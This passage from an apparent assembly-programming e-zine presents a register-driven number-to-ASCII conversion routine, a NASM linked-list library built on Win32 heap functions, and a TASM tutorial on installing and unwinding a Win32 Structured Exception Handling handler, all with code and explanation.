   EAX = SSFFPPRR           (hexadecimal value of course)
   SS    size    size of the datum you will be calling the main routine with,
                 only 3 values are valid:
                         0=byte
                         1=word
                         2=dword
   FF    field   size of a field in which to right-justify the number,
                 if this is 0 then there is no right-justification; you
                 only get the number
   PP    pad     the ASCII value of the character to use to right-justify
                 the number in the field of output
   RR    radix   the radix to output the number in
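
    As an illustration of the layout above, the control DWORD can be put
together like this. The sketch is in C only because that is easy to try
out on any machine; the helper nu_pack and the NU_* names are made up
and are not part of the routine.

```c
#include <stdint.h>

enum { NU_BYTE = 0, NU_WORD = 1, NU_DWORD = 2 };   /* SS values from the table */

/* Hypothetical helper: assemble the control dword that goes into EAX. */
uint32_t nu_pack(uint8_t size, uint8_t field, char pad, uint8_t radix)
{
    return ((uint32_t)size  << 24) |            /* SS */
           ((uint32_t)field << 16) |            /* FF */
           ((uint32_t)(uint8_t)pad << 8) |      /* PP */
            (uint32_t)radix;                    /* RR */
}
```

    So a word value in hexadecimal, right-justified with spaces in a
field of 6, would be requested with EAX = 01062010 hex.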

    Once you've set the control parameters you can call the main routine
(nuconv) freely to do the work. You call the main routine with ES:DI set
to where the output is to be stored, and the value to be output in AL or
AX or EAX (depending on what data size you set).

    I use the word 'output' here which might conjure up images of the screen,
but in fact what we are doing here is writing all the ASCII to memory.
This is much more powerful than incorporating all that OS/application
specific nonsense, and it really doesn't cost much overhead at all (in
fact this is the way C does it and even though I **HATE** C, here it is
right on the mark;)

    Here is the code:

================START OF CODE==============================================
;
;nuconvs- set control parameters for 'nuconv'
;
;     !!  this must be called at least once before calling nuconv
;
;entry:   EAX=SSFFPPRR  (hex digits)
;
;         where:  SS=data size (0=byte,1=word,2=dword)
;                 FF=field size (0=none)
;                 PP=pad char
;                 RR=radix (2-16)
;
;     !!  these parameters must be set correctly by the application
;     !!  they are not validated in any way and invalid parameters
;     !!  will cause undefined operation
;
;exit:    (all registers preserved)
;

nuconvs PROC NEAR
         MOV DWORD PTR CS:[nuradix],EAX
         RET
nuconvs ENDP

;
;control parameters
;
;   !!  these absolutely must be in the below order due to the way the above
;       routine works
;

nuradix DB ?            ;output radix
nupad   DB ?            ;pad character
nufld   DB ?            ;field size
nudsiz  DB ?            ;data size

;
;nuconv- output value in accumulator -> ES:DI
;
;     !! see 'nuconvs' header for more information
;
;entry:  AL|AX|EAX=value to output
;        ES:DI=address to write output data
;
;        size of accumulator that is used depends on what the current data
;        size is ( as specified by a previous call to 'nuconvs' )
;
;
;exit:   DI=updated to offset of last character + 1
;
;        (all other registers preserved)
;

nuconv  PROC NEAR
;
;all registers are going to be preserved
;
         PUSH DS
         PUSH EAX
         PUSH EBX
         PUSH CX
         PUSH EDX
;
;save some CS: overrides
;
         PUSH CS
         POP DS
;
;initialise
;
; set EBX =radix
;     CX  =fieldsize
;
; also we zero pad out the datum passed so it fills EAX
;
         XOR EBX,EBX

         CMP BL,BYTE PTR DS:[nudsiz]
         JNP SHORT ko1
         JS SHORT ko0
         MOV AH,0
ko0:    DEC BX
         AND EAX,EBX
         INC BX
ko1:

         MOV BL,BYTE PTR DS:[nuradix]
         MOV CH,0
         MOV CL,BYTE PTR DS:[nufld]
;
;calculate digits and push to stack
;
;  EAX is divided and modulus taken which is the standard way,
;  loop exits when it reaches 0 or the field size is hit
;  notice that if CX=0 on entry to this then the field size
;  will be effectively unbounded
;
nulop0: XOR EDX,EDX
         DIV EBX
         PUSH DX
         AND EAX,EAX
         LOOPNZ nulop0
;
;'output' the field padding
;
;  the number of padding characters is normally the value
;  now in CX (ie: fieldsize - digits ). however no pad chars
;  should be output if field size = 0. i think the check here
;  for this is nice and tight (read the code...)
;
         MOV BX,CX
         NEG BX
         JNS SHORT ko
         MOV AL,BYTE PTR DS:[nupad]
         REP STOSB
ko:
;
;'output' all the digits
;
;  CX is set to the number of digits on the stack we have to output
;  ie: fieldsize - ( fieldsize - digits )
;
         MOV CH,0
         MOV CL,BYTE PTR DS:[nufld]
         ADD CX,BX
;
;  now we pop off those #CX digits translating into ASCII using a nice
;  variation of the traditional speed method
;
         MOV BX,OFFSET nudat

nulop1: POP AX
         XLAT
         STOSB
         LOOP nulop1
;
;  restore all registers and exit (in case it wasn't obvious!)
;
         POP EDX
         POP CX
         POP EBX
         POP EAX
         POP DS
         RET
;
nudat   DB "0123456789ABCDEF"
;
nuconv  ENDP

==================END OF CODE==============================================
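
    To make the behaviour easier to experiment with, here is a model of
nuconv in C. It is a sketch under my reading of the code above, not a
translation: nu_format is a made-up name, the control DWORD is passed as
an argument instead of being stored by nuconvs, and a radix outside 2-16
is rejected where the assembly version leaves the result undefined.

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical C model of nuconv. Writes the digits of value to out
   according to params (SSFFPPRR) and returns a pointer just past the
   last character written, like DI on exit. No terminating zero is added. */
char *nu_format(char *out, uint32_t value, uint32_t params)
{
    static const char digit_tab[] = "0123456789ABCDEF";
    uint8_t radix = (uint8_t)(params & 0xFF);
    char    pad   = (char)((params >> 8) & 0xFF);
    uint8_t field = (uint8_t)((params >> 16) & 0xFF);
    uint8_t size  = (uint8_t)((params >> 24) & 0xFF);
    char stack[32];                 /* 32 binary digits is the worst case */
    size_t count = 0;

    if (radix < 2 || radix > 16)
        return out;                 /* the original does not validate this */

    if (size == 0)
        value &= 0xFF;              /* byte: keep AL only */
    else if (size == 1)
        value &= 0xFFFF;            /* word: keep AX only */

    /* divide until the value reaches 0 or the field is full */
    do {
        stack[count++] = digit_tab[value % radix];
        value /= radix;
    } while (value != 0 && (field == 0 || count < field));

    for (size_t i = count; i < field; ++i)
        *out++ = pad;               /* field padding, none if field = 0 */
    while (count > 0)
        *out++ = stack[--count];    /* digits, most significant first */
    return out;
}
```

    Note what the loop condition implies: when a number has more digits
than the field allows, only the low-order digits that fit are written.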



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                             Linked Lists in ASM
                                                             by mammon_


Assembly language is notorious for being low-level; to wit, it lacks many of
the features in higher-level languages which make programming easier. In the
course of my work in the visasm project I have put quite a bit of time into
working on exactly which higher language features are important and which, in a
nutshell, are swill.

One of the areas in which assembly language is lacking is the use of dynamic
structures. Pointer manipulation in asm is simple and clear for up to one
level of redirection; further redirection causes the code to quickly become a
confusion of register juggling and indirect addressing. As a result,
implementing even a simple linked list in assembly language can be tedious
enough to make one rewrite the project in C.

In this article I have undertaken an implementation of a linked list in NASM;
the implementation is generic enough to support more complex data structures,
and should port to other assemblers with few changes.

To begin with, one must define the memory allocation routines for use in the
application; I have chosen Win32 for convenience. The routines defined below
are for local heap allocation and for the Win32 console interface to allow the
use of STDOUT on the console.
;=========================================================Win32 API Definitions
STD_INPUT_HANDLE     EQU        -10     ;nStdHandle types
STD_OUTPUT_HANDLE    EQU        -11
STD_ERROR_HANDLE     EQU        -12

EXTERN AllocConsole                     ;BOOL AllocConsole()
EXTERN GetStdHandle                     ;HANDLE GetStdHandle( nStdHandle )
EXTERN WriteConsoleA  ;HANDLE hConsole, lpBuffer, Num2Write, lpWritten,NULL
EXTERN ExitProcess    ;UINT ExitCode
EXTERN GetProcessHeap ;
EXTERN HeapAlloc      ;HANDLE hHeap,DWORD dwFlags, DWORD dwBytes:ret ptr
EXTERN HeapFree       ;HANDLE hHeap,DWORD dwFlags, LPVOID lpMem
EXTERN HeapReAlloc    ;HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,DWORD dwBytes
EXTERN HeapDestroy    ;HANDLE hHeap
%define HEAP_NO_SERIALIZE               0x00000001
%define HEAP_GROWABLE                   0x00000002
%define HEAP_GENERATE_EXCEPTIONS        0x00000004
%define HEAP_ZERO_MEMORY                0x00000008
%define HEAP_REALLOC_IN_PLACE_ONLY      0x00000010
%define HEAP_TAIL_CHECKING_ENABLED      0x00000020
%define HEAP_FREE_CHECKING_ENABLED      0x00000040
%define HEAP_DISABLE_COALESCE_ON_FREE   0x00000080
%define HEAP_CREATE_ALIGN_16            0x00010000
%define HEAP_CREATE_ENABLE_TRACING      0x00020000
%define HEAP_MAXIMUM_TAG                0x0FFF
%define HEAP_PSEUDO_TAG_FLAG            0x8000
%define HEAP_TAG_SHIFT                  16
;===========================================================End API Definitions


In addition, it is useful to define a few common routines for use later:
;==============================================================Utility Routines
[section data class=DATA use32]             ;set up the segments early
%macro STRING 2+
%1:      db %2
.end:
%define %1.length  %1.end - %1
%endmacro
[section code class=CODE use32]

GetConsole:
;GetConsole()
[section data]
hConsole        DD      0
[section code]
         call AllocConsole
         push dword STD_OUTPUT_HANDLE
         call GetStdHandle
         mov [hConsole], eax
         xor eax, eax
         ret

puts:
;puts( ptrString, NumBytes )
[section data]
NumWrote        DD 0
[section code]
%define _ptrString ebp + 8
%define _strlen ebp + 12
         push ebp
         mov ebp,esp
         push eax
         push dword 0
         push dword NumWrote
         mov eax, [ _strlen ]
         push dword eax
         mov eax, [ _ptrString ]
         push dword eax
         push dword [hConsole]
         call WriteConsoleA
         pop eax
         mov esp, ebp
         pop ebp
         ret 8
;==========================================================End Utility Routines
The STRING macro is particularly interesting; it allows one to define a string
in the data segment as
         STRING label, 'contents of string',0Dh,0Ah
while defining the constant label.length as the total length of the string.
This will come in handy during the many calls to puts, which is used to write
to the Win32 console. Puts has the syntax
         puts( lpString, strLength )
and calls WriteConsole, which yields a BOOL value; note that puts as listed
restores EAX before returning, so that result does not reach the caller.
GetConsole is a routine provided to move the Win32 console allocation code out
of the main program; it takes no parameters and defines the hConsole handle.

The linked list implementation has been designed to be extendable; the routine
names are prefaced with underscores to avoid filling up the namespace of the
linked list application, and the routines themselves are generic enough to be
called from higher-level Stack, Queue, and List implementations. The Linked
List interface is as follows:
         ptrHead    _create_list( hHeap, NodeSize )
         void       _delete_list( hHeap, ptrHead)
         ptrNode    _add_node( hHeap, ptrPrev, NodeSize )
         void       _delete_node( hHeap, ptrPrev, ptrNode )
         void       _set_node_data( ptrNode, NodeOffset, data )
         DWORD data _get_node_data( ptrNode, NodeOffset )
The names of the routines should make their intent apparent; note however that
NodeSize is assumed to be the size of a LISTSTRUCT structure.
;====================================================Linked List Implementation
[section data]
;Define .next as offset Zero for use in generic functions
     struc _llist
      .next:      resd 1                         ;this is basically a constant
     endstruc

;Macro to ensure that .next is always at offset zero in user-defined lists
%macro LISTSTRUCT 1
   struc %1
   .next:        resd 1
%endmacro
%macro END_LISTSTRUCT 0
   endstruc
%endmacro

[section code]
;Note that these assume a LISTSTRUCT base type
_create_list:
; ptrHead _create_list( hHeap, NodeSize )
%define _hHeap ebp + 8
%define _ListSize ebp + 12
         ENTER 0 , 0
         push dword [_ListSize]                  ;size of LISTSTRUCT
         push dword HEAP_ZERO_MEMORY             ;FLAG for HeapAlloc
         push dword [_hHeap]                     ;Heap being used
         call HeapAlloc
         test eax, eax
         jz .Error                               ;Alloc failed!
         mov [eax + _llist.next], dword 0        ;.next pointer = NULL
.Exit:  LEAVE                                   ;eax = ptrHead
         ret 8
.Error: xor eax, eax                            ;error = return NULL
         jmp .Exit

_delete_list:
; _delete_list( hHeap, ptrHead)
%define _hHeap ebp + 8
%define _ptrHead ebp + 12
         ENTER 0, 0
         push eax
         push ebx                                ;save registers
         mov eax, [_ptrHead]                     ;eax = addr of list head node
.DelNode:
         mov ebx, [eax + _llist.next]            ;ebx = [eax].next
         push eax                                ;free addr in eax
         push dword 0                            ;FLAG
         push  dword [_hHeap]                    ;local heap
         call HeapFree
         test ebx, ebx                           ;is [eax].next == NULL?
         jz .Exit                                ;if yes then done
         mov eax, ebx                            ;loop until done
         jmp .DelNode
.Exit:  pop ebx
         pop eax
         LEAVE
         ret 8

_add_node:
; ptrNode _add_node( hHeap, ptrPrev, NodeSize )
%define _hHeap ebp + 8
%define _ptrPrev ebp + 12
%define _ListSize ebp + 16
         ENTER 0, 0
         push edx                                ;HeapAlloc kills edx!!
         push ebx
         push ecx                                ;save registers
         mov ebx, [_ptrPrev]                     ;ebx = node to add after
         push dword [_ListSize]                  ;size of node
         push dword HEAP_ZERO_MEMORY             ;FLAG
         push dword [_hHeap]                     ;local heap
         call HeapAlloc
         test eax, eax
         jz .Error                               ;alloc failed!
         mov ecx, [ebx + _llist.next]            ;ecx = ptrPrev.next
         mov [eax + _llist.next], ecx            ;ptrNew.next = ptrPrev.next
         mov [ebx + _llist.next], eax            ;ptrPrev.next = ptrNew
.Exit:  pop ecx
         pop ebx
         pop edx
         LEAVE
         ret 12
.Error: xor eax, eax                            ;return NULL on failure
         jmp .Exit

_delete_node:
; _delete_node( hHeap, ptrPrev, ptrNode )
%define _hHeap ebp + 8
%define _ptrPrev ebp + 12
%define _ptrNode ebp + 16
         ENTER 0, 0
         push ebx
         mov eax, [_ptrNode]                     ;eax = ptrNode
         mov eax, [eax + _llist.next]            ;eax = ptrNode.next
         mov ebx, [_ptrPrev]                     ;ebx = ptrPrev
         mov [ebx + _llist.next], eax            ;ptrPrev.next = ptrNode.next
         push dword [_ptrNode]                   ;free ptrNode
         push dword 0                            ;FLAG
         push dword [_hHeap]                     ;local heap
         call HeapFree
         pop ebx
         LEAVE
         ret 12

_set_node_data:
; _set_node_data( ptrNode, NodeOffset, data )
%define _ptrNode ebp + 8
%define _off ebp + 12
%define _data ebp + 16
         ENTER 0, 0
         push eax
         push ebx
         mov eax, [_ptrNode]                     ;eax = ptrNode
         add eax, [ _off ]                       ;eax = ptrNode.offset
         mov ebx, [_data]                        ;ebx = data
         mov [eax], ebx                          ;ptrNode.offset = data
         pop ebx
         pop eax
         LEAVE
         ret 12

_get_node_data:
; DWORD data _get_node_data( ptrNode, NodeOffset )
%define _ptrNode ebp + 8
%define _off ebp + 12
         ENTER 0, 0
         mov eax, [_ptrNode]                     ;eax = ptrNode
         add eax, [_off]                         ;eax = ptrNode.offset
         mov eax, [eax]                          ;return [ptrNode.offset]
         LEAVE
         ret 8
;===============================================================End Linked List
The LISTSTRUCT structure is perhaps the most crucial part of this
implementation. In NASM, a structure is simply a starting address with local
labels defined as constants, each equal to the offset of that label from the
start of the structure. Thus, in the structure
    struc MyStruc
      .MyVar   resd 1
      .MyVar2  resd 1
      .MyVar3  resd 1
      .MyByte  resb 1
    endstruc
the constant MyStruc.MyVar has a value of 0 [0 bytes from the start of the
structure], MyStruc.MyVar2 has a value of 4, MyStruc.MyVar3 has a value of 8,
MyStruc.MyByte has a value of 12, and MyStruc_size [defined as the offset of
the "endstruc" directive] has a value of 13. Note that in NASM, the name of a
structure instance determines the address in memory of the instance [i.e., it
is a simple code label], while the constants defined in the structure
definition allow access to offsets from that address.

What this means is that structures in NASM can be defined and never
instantiated, allowing the convenient use of the structure constants for
dynamic memory structures such as classes and linked list nodes. The above
code uses the LISTSTRUCT macro to force all linked list nodes to have a ".next"
member; this also allows the use of the constant "_llist.next" in the linked
list routines to avoid having to pass the offset of the ".next" member for a
node.
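The same idea can be sketched in portable C, purely as an illustration: the
layout is declared once, never instantiated, and its member offsets are then
used as plain constants against raw memory. The names my_node, set_member and
get_member are hypothetical and only mirror what _set_node_data and
_get_node_data do; they are not part of the NASM routines above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical node layout; used only for its member offsets. */
struct my_node {
    struct my_node *next;   /* plays the role of the ".next" member */
    uint32_t        value;
};

/* Store a 32-bit value at byte offset `off` inside a raw memory block. */
void set_member(void *node, size_t off, uint32_t data)
{
    assert(node != NULL);
    memcpy((unsigned char *)node + off, &data, sizeof data);
}

/* Load a 32-bit value from byte offset `off` inside a raw memory block. */
uint32_t get_member(const void *node, size_t off)
{
    uint32_t data;
    assert(node != NULL);
    memcpy(&data, (const unsigned char *)node + off, sizeof data);
    return data;
}
```

Here offsetof(struct my_node, value) plays the part that a constant such as
llist.data plays in the assembly source.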

The implementation routines should be pretty straightforward. _create_list
allocates memory from the local heap of the size of one list node [determined
by the parameter NodeSize passed to _create_list] and returns the address of
the allocated memory; since this node is assumed to be the list "head", the
.next member is set to NULL. _delete_list is passed the address of the head
node of the list; it saves the address in the .next member of the node and
then frees the memory allocated to the node, repeating this with each .next
link until the .next member is NULL [indicating an end of list].
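As a rough C model of those two routines (a sketch only, assuming the C
runtime heap via calloc/free in place of HeapAlloc/HeapFree; list_node,
create_list and delete_list are illustrative names), note how the .next link
is saved before the node that holds it is freed:

```c
#include <assert.h>
#include <stdlib.h>

struct list_node {
    struct list_node *next;
};

/* Allocate a zeroed head node of node_size bytes; its .next starts as NULL. */
struct list_node *create_list(size_t node_size)
{
    struct list_node *head;
    assert(node_size >= sizeof(struct list_node));
    head = calloc(1, node_size);
    if (head != NULL)
        head->next = NULL;
    return head;
}

/* Free every node from head onward; returns the number of nodes freed. */
size_t delete_list(struct list_node *head)
{
    size_t freed = 0;
    while (head != NULL) {
        struct list_node *next = head->next;  /* save the link first */
        free(head);
        head = next;
        freed++;
    }
    return freed;
}
```

The returned count is an addition for the sake of the sketch; the assembly
routine as described does not report one.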

_add_node is used to insert a node into an existing list; it is passed the
address of the node after which the new node is to be inserted. The .next
member of this node is moved into the .next member of the new node, and
replaced with the address of the new node. Thus, if before insertion the list
had the structure
       .next [Node1] --> .next [Node2] --> .next [NULL]
       .data NULL        .data Node1       .data Node2
then it would have the following structure after insertion following Node1:
       .next [Node1] --> .next [NewNode] --> .next [Node2] --> .next [NULL]
       .data NULL        .data Node1         .data NewNode     .data Node2
_delete_node does the opposite of _add_node; it moves the .next member of the
node to be deleted into the .next member of the preceding node, then frees the
specified node.
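The pointer updates can be written out in C as a minimal sketch, assuming
malloc-style allocation rather than the Win32 heap; snode, add_node and
delete_node are hypothetical names that mirror the assembly routines:

```c
#include <assert.h>
#include <stdlib.h>

struct snode {
    struct snode *next;
    int           data;
};

/* Insert a new zeroed node after prev; returns the new node or NULL. */
struct snode *add_node(struct snode *prev, size_t node_size)
{
    struct snode *fresh;
    assert(prev != NULL && node_size >= sizeof *fresh);
    fresh = calloc(1, node_size);
    if (fresh == NULL)
        return NULL;
    fresh->next = prev->next;   /* new node inherits the old successor */
    prev->next = fresh;         /* predecessor now points at the new node */
    return fresh;
}

/* Unlink node, which must directly follow prev, and free it. */
void delete_node(struct snode *prev, struct snode *node)
{
    assert(prev != NULL && node != NULL && prev->next == node);
    prev->next = node->next;
    free(node);
}
```

The order of the two assignments in add_node matters: the old successor has
to be copied into the new node before the predecessor's link is overwritten.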

Note that both _delete_node and _add_node are designed to be as generic as
possible and make no assumptions regarding the linked list structure; thus in
a double linked list of the format
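      struc DLLIST
       .next  resd 1
       .prev  resd 1
       .data  resd 1
      endstruc
one could front-end the Delete function as follows:
DelNode:
         push dword eax                   ;ptrNode: eax = node to delete
         push dword [eax + DLLIST.prev]   ;ptrPrev
         push dword [hHeap]               ;hHeap
         call _delete_node                ;[successor's .prev is not patched here]
         ret                              ;DelNode takes no stack arguments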
The other linked list routines can be provided with similar front-ends to take
care of common heap handles, list sizes, and member assignments.

Both the _set_node_data and the _get_node_data routines are basic pointer
manipulations added for code clarity. Each could be rewritten inline; for
example, the _get_node_data routine can be implemented as
         add ebx, offset
         mov eax, [ebx]
assuming ebx holds the node to be accessed and "offset" is the offset [or
constant] of the node member to be accessed.

Below is a simple program which makes a four-node linked list of the format
         .next Node1 --> .next Node2 --> .next Node3 --> .next NULL
         .prev NULL  <-- .prev Head  <-- .prev Node1 <-- .prev Node2
         .data NULL      .data 'node1'   .data 'node2'   .data 'node3'
Note the use of the NewNode routine, which provides a front-end to _add_node
that sets the .prev member for the new node. One brief caveat: the example
does not delete the list, as the Win32 heap is deallocated on program
termination; neither is there any substantial error checking in the sample.

;=======================================================Linked List Application
[section data]
hHeap    dd 0
ptrHead  dd 0
STRING strData1, 'node 1',0Dh,0Ah
STRING strData2, 'node 2',0Dh,0Ah
STRING strData3, 'node 3',0Dh,0Ah
STRING strStart, 'Creating List',0Dh,0Ah
STRING strDone, 'Finished!',0Dh,0AH,'Printing Data...',0Dh,0Ah
STRING strErr, 'Error!',0Dh, 0AH

LISTSTRUCT llist
.prev   resd 1
.data   resd 1
END_LISTSTRUCT

[section code]
Error:
         push dword strErr.length
         push dword strErr
	 call puts
         jmp Exit

..start:
	 call GetProcessHeap
         mov [hHeap], eax
         call GetConsole

         push dword strStart.length
         push dword strStart
	 call puts

CreateList:
         push dword llist_size
         push dword [hHeap]
         call _create_list
         test eax, eax
         jz Error
         mov [ptrHead], eax
         push dword 0
         push dword llist.data
         push eax
         call _set_node_data             ;set ptrHead.data to NULL
         push dword 0
         push dword llist.prev
         push eax
         call _set_node_data             ;set ptrHead.prev to NULL

         call NewNode                    ;create Node1
         test eax, eax
         jz ListDone
         push dword strData1
         push dword llist.data
         push eax
         call _set_node_data            ;set Node1.data to 'node1'

         call NewNode                   ;create Node2
         test eax, eax
         jz ListDone
         push dword strData2
         push dword llist.data
         push eax
         call _set_node_data            ;set Node2.data to 'node2'

         call NewNode                   ;create Node3
         test eax, eax
         jz ListDone
         push dword strData3
         push dword llist.data
         push eax
         call _set_node_data            ;set Node3.data to 'node3'

ListDone:
         push dword strDone.length
         push dword strDone
         call puts

         mov ebx, [ptrHead]
PrintList:
         push dword _llist.next
         push ebx
         call _get_node_data             ;could have been mov eax,[ebx]

         test eax, eax                   ;if ptrCurrent.next == NULL exit
         jz Exit                         ; [end of list]
         mov ebx, eax                    ;save ptrNode
         push dword strData1.length      ;push length for call to puts
         push dword llist.data
         push ebx
         call _get_node_data             ;get ptrNode.data
         push dword eax                  ;push string for call to puts
         call puts
         jmp PrintList                   ;loop

Exit:
	 push dword 0
         call ExitProcess

NewNode:
         ENTER 0, 0
         push edx
         mov edx, eax                    ;save previous node
         push dword llist_size
         push dword eax
         push dword [hHeap]
         call _add_node
         test eax, eax
         jz .Done
         push dword eax
         push dword llist.next
         push dword edx
         call _set_node_data             ;set ptrPrev.next to ptrNew
         push edx
         push dword llist.prev
         push eax
         call _set_node_data             ;set ptrNew.prev to ptrPrev
         push dword 0
         push dword llist.next
         push eax
         call _set_node_data             ;set PtrNew.next to  NULL
.Done:  pop edx
         LEAVE                           ;eax is still set to ptrNew
         ret
;==========================================================================EOF
As mentioned earlier, this is a generic implementation of dynamic structures
designed with linked lists in mind. The macros and routines may be included in
a header file such as llist.h and used to automate the creation of dynamic
memory structures in future projects. In addition, further macros and routines
can be added to provide specific implementations of Single Linked Lists,
Double Linked Lists, Circular Lists, Stacks, Queues, and Deques.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                      Structured Exception Handling under Win32
				      by Chris Dragan


    Structured Exception Handling is a powerful feature of all Win32 platforms
that allows a program to recover from critical errors such as BOUND, divide
overflow, a missing page or a general protection fault. It is documented only
for C-level usage (try-except/finally syntax); no documentation for low-level
languages exists. Therefore I will try to show how to use it.

    The starting point for Structured Exception Handling, SEH, is the Thread
Info Block. The TIB, like almost all the other structures, is described in the
winnt.h file that comes with the Platform SDK.

struc NT_TIB
         ExceptionList        dd ? ; Used by SEH
         StackBase            dd ? ; Used by functions to check for
         StackLimit           dd ? ;  stack overflow
         SubSystemTib         dd ? ; ?
         FiberDataOrVersion   dd ? ; ?
         ArbitraryUserPointer dd ? ; ?
         Self                 dd ? ; Linear address of the TIB
ends

The TIB is accessible at address fs:0. NT_TIB.Self contains the linear address
of the TIB, that is, the base of the FS segment.

    When an exception occurs, the system uses (dword)fs:0, NT_TIB.ExceptionList,
to find an exception handler and execute it. The exception list entry is very
simple:

struc E_L_ENTRY
         Next             dd ?          ; Points to next entry in the list
         ExceptionHandler dd ?          ; User callback - exception hook
         Optional         db X dup (?)  ; Exception Handler data
         EntryTerminator  dd -1         ; Optional
ends

C compilers usually keep some additional information in the E_L_ENTRY.Optional
field, which varies in size and is usually terminated with (dword)-1. Neither
the .Optional nor the .EntryTerminator field is required.

    Before calling an exception handler, the exception manager pushes
ExceptionRecord and ContextRecord onto the stack. These structures identify the
exception and the processor state before it. The exception manager also adds
its own entry to the exception list.

    An exception handler is in fact a typical callback. It is not, however,
installed by any API function, but appended to the exception list as an
E_L_ENTRY.

EXCEPTION_DISPOSITION __cdecl _except_handler (
     struct _EXCEPTION_RECORD *ExceptionRecord,
     void * EstablisherFrame,
     struct _CONTEXT *ContextRecord,
     void * DispatcherContext
     );

The exception handler uses the C calling convention: it does not release its
arguments when returning. The most important parameters are ExceptionRecord
and ContextRecord, described at the end of this text, which point to the
corresponding pushed structures. I do not yet know the purpose of
EstablisherFrame and DispatcherContext.

struc EXCEPTION_RECORD
         ExceptionCode        dd ?  ; See at the end of this text
         ExceptionFlags       dd ?
         ExceptionRecord      dd ?  ; ?
         ExceptionAddress     dd ?  ; Linear address of faulty instruction
         NumberParameters     dd ?  ; Corresponds to the field below
         ExceptionInformation dd 15 dup (?) ; ?
ends

Exception flags are:

EXCEPTION_NONCONTINUABLE = 1
EXCEPTION_UNWINDING  = 2
EXCEPTION_UNWINDING_FOR_EXIT = 4

    The exception handler has two possible ways of proceeding. It can return to
the exception manager, or it can unwind the stack and continue the program. In
the first case it has to return one of the following values:

enum EXCEPTION_DISPOSITION \
	 ExceptionContinueExecution  = 0,\
	 ExceptionContinueSearch     = 1,\
	 ExceptionNestedException    = 2,\
	 ExceptionCollidedUnwind     = 3

A value of zero makes the exception manager resume the program at the cs:eip
saved in the context, which the exception handler may have altered. A value of
1 causes the exception manager to call the next exception handler in the
exception list. Values 2 and 3 inform the exception manager that an error
occurred: either an exception was raised inside a handler, or the handler tried
to unwind the stack while another, outer handler was already doing so. Whether
an unwind is in progress can be determined by testing .ExceptionFlags for
EXCEPTION_UNWINDING or EXCEPTION_UNWINDING_FOR_EXIT.
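
The search through the exception list can be modelled in a few lines of
portable C. This is only a toy model of the behaviour described above, not
the system's real dispatcher: chain_entry, dispatch and both sample handlers
are made-up names, the handlers receive just the exception code, and the list
is assumed to end with NULL.

```c
#include <assert.h>
#include <stddef.h>

enum disposition {
    CONTINUE_EXECUTION = 0,   /* handler dealt with the exception */
    CONTINUE_SEARCH    = 1    /* try the next handler in the list */
};

typedef enum disposition (*handler_fn)(unsigned long code);

struct chain_entry {
    struct chain_entry *next;     /* like E_L_ENTRY.Next */
    handler_fn          handler;  /* like E_L_ENTRY.ExceptionHandler */
};

/* Walk the list from the newest entry; return the entry whose handler
   accepted the exception, or NULL if every handler declined. */
const struct chain_entry *dispatch(const struct chain_entry *head,
                                   unsigned long code)
{
    const struct chain_entry *e;
    for (e = head; e != NULL; e = e->next) {
        assert(e->handler != NULL);
        if (e->handler(code) == CONTINUE_EXECUTION)
            return e;
    }
    return NULL;
}

/* Sample handler that never handles anything. */
enum disposition decline_all(unsigned long code)
{
    (void)code;
    return CONTINUE_SEARCH;
}

/* Sample handler that accepts only STATUS_ILLEGAL_INSTRUCTION. */
enum disposition accept_illegal_instruction(unsigned long code)
{
    return code == 0xC000001DUL ? CONTINUE_EXECUTION : CONTINUE_SEARCH;
}
```

With an inner entry using decline_all linked to an outer entry using
accept_illegal_instruction, dispatch passes over the inner entry and stops at
the outer one for code 0C000001Dh.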

    When appending a new exception handler to the exception list, a common
practice is to push the new E_L_ENTRY onto the stack. This way unwinding the
stack can be done simply by skipping the exception manager's entry and
restoring the stack pointer.

Here is an example of exception handling.

----Start-of-file-------------------------------------------------------------

ideal
p686n
model flat, stdcall

   O equ <offset>

   struc EXCEPTION_RECORD
	 ExceptionCode  dd ?
	 ExceptionFlags  dd ?
	 ExceptionRecord  dd ?
	 ExceptionAddress dd ?
	 NumberParameters dd ?
	 ExceptionInformation dd 15 dup (?)
   ends

   procdesc wsprintfA c :dword, :dword, :dword:?
   procdesc MessageBoxA :dword, :dword, :dword, :dword
   procdesc ExitProcess :dword

udataseg

   ExCode dd ?
   szCode db 12 dup (?)

dataseg

   szWindowTitle db 'Exception code', 0
   szFormat db '%0X', 0

codeseg

proc main
		 ; Install exception handler
			 push O ExceptionHandler
			 push [dword fs:0] ; E_L_ENTRY.Next
			 mov [fs:0], esp ; Append new E_L_ENTRY

		 ; Cause Invalid Opcode exception
			 ud2

		 ; Display exception code and quit
_Continue:  call wsprintfA, O szCode, O szFormat, [ExCode]
			 call MessageBoxA, 0, O szCode, O szWindowTitle, 0
			 call ExitProcess, 0
endp

proc ExceptionHandler c ExceptionRecord, EF, ContextRecord, DC
		 ; Save exception code
			 mov eax, [ExceptionRecord]
			 mov ecx, [(EXCEPTION_RECORD eax).ExceptionCode]
			 mov [ExCode], ecx

		 ; Unwind the stack
			 mov eax, [fs:0] ; Exception Manager's entry
			 mov esp, [eax] ; Our entry
			 pop [dword fs:0] ; Restore fs:0
			 add esp, 4  ; Skip ExHandler address
			 jmp _Continue
endp

end main

----End-of-file---------------------------------------------------------------

The above source should be compiled with TASM 5.0r or later like this:
   tasm32 /ml except.asm
   tlink32 /x /Tpe /aa /c /V4.0 except.obj,,, LIBPATH\import32.lib

    And here are other important constants and structures, all defined in the
winnt.h Platform SDK file.

Exception codes:
----------------

STATUS_SEGMENT_NOTIFICATION     = 040000005h
STATUS_GUARD_PAGE_VIOLATION     = 080000001h
STATUS_DATATYPE_MISALIGNMENT    = 080000002h
STATUS_BREAKPOINT               = 080000003h
STATUS_SINGLE_STEP              = 080000004h
STATUS_ACCESS_VIOLATION         = 0C0000005h
STATUS_IN_PAGE_ERROR            = 0C0000006h
STATUS_INVALID_HANDLE           = 0C0000008h
STATUS_NO_MEMORY                = 0C0000017h
STATUS_ILLEGAL_INSTRUCTION      = 0C000001Dh
STATUS_NONCONTINUABLE_EXCEPTION = 0C0000025h
STATUS_INVALID_DISPOSITION      = 0C0000026h
